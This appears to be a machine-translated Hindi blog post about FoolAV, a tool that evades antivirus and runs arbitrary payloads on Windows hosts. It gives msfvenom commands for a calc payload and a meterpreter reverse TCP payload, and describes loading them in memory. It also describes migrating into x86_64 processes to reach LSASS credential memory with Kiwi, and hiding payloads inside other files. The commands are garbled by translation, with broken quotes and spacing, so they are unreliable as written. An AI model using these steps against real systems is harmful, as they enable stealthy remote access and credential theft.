FoolAV – एंटीवायरस इवेशन के लिए पेन्टेस्ट टूल और रनिंग अरबिटवर्ड पेलोड

FoolAV - एंटीवायरस के लिए पेन्टेस्ट टूल और टारगेट विंटेल होस्ट पर रनिंग अरबिटवर्स पेलोड

FoolAV एंटीवायरस चोरी और लक्ष्य विंट होस्ट पर मनमाना पेलोड चलाने का एक उपकरण है।

यह प्रवेश परीक्षणों के दौरान उपयोगी है जहां कुछ पेलोड को निष्पादित करने की आवश्यकता होती है (मीटरपरेटर हो सकता है?), जबकि यह निश्चित है कि एंटीवायरस सॉफ़्टवेयर द्वारा इसका पता नहीं लगाया जाएगा। केवल दो फ़ाइलों को अपलोड करने में सक्षम होना चाहिए: बाइनरी निष्पादन योग्य तथा पेलोड फ़ाइल उसी निर्देशिका में।

उपयोग:

1. अपना पेलोड (x86) तैयार करें, अर्थात

  • calc: msfvenom -p windows / exec CMD = calc.exe EXITFUNC = thread -e x86 / shikata_ga_nai -b ” x00 x0a x0d xff” -f “2 2 / / dev / null | egrep “^ ” “| tr -d” ” n?” > foolav.mf (आपको वास्तव में किसी भी एनकोडर या पात्रों को ब्लैकलिस्ट करने की आवश्यकता नहीं है, यह वैसे भी काम करेगा)
  • meterpreter: msfvenom -p windows / meterpreter_reverse_tcp LHOST = … -a x86 -f c 2> / dev / null | egrep “^ ” “| tr -d” ” n?” > foolav.mf

2. कॉपी पेलोड फ़ाइल [executable-name-without-exe-extension].mf एक ही निर्देशिका में निष्पादन योग्य पेलोड चल रहा है जो उपर्युक्त कमांड का उपयोग करते हुए उत्पन्न calc.exe है:

3. एक बार निष्पादन योग्य चलने के बाद, पेलोड फ़ाइल को पार्स किया जाएगा, अलग थ्रेड में लोड किया जाएगा और मेमोरी में निष्पादित किया जाएगा:

फूलव कैल्क स्क्रीनशॉट

टिप्पणियाँ:

  • x86 बाइनरी x86 और x86_64 दोनों विंडोज सिस्टम पर चलेगा। फिर भी, आपको x86 आर्किटेक्चर पेलोड का उपयोग करने की आवश्यकता है। फिर भी, x86 मीटरपाइप पेलोड x86_64 प्रक्रियाओं में माइग्रेट किया जा सकता है। उसके बाद, लोड कीवी x86_64 संस्करण लोड करेगा जिससे LSASS प्रक्रिया मेमोरी की रसदार सामग्री का उपयोग संभव होगा 🙂
फ़ूलव मीटरपरेटर स्क्रीनशॉट
  • .mf पेलोड फ़ाइल को बाधित किया जा सकता है – पार्सर के अलावा हर चरित्र को अनदेखा करेगा xHH हेक्साडेसिमल क्रम। इसका मतलब है, यह आपके पेलोड को लगभग किसी भी फ़ाइल में जोड़ सकता है, इसे लाइनों के बीच छिपा सकता है या अपनी टिप्पणी भी जोड़ सकता है, उदाहरण:
फूलवम्फ स्क्रीनशॉट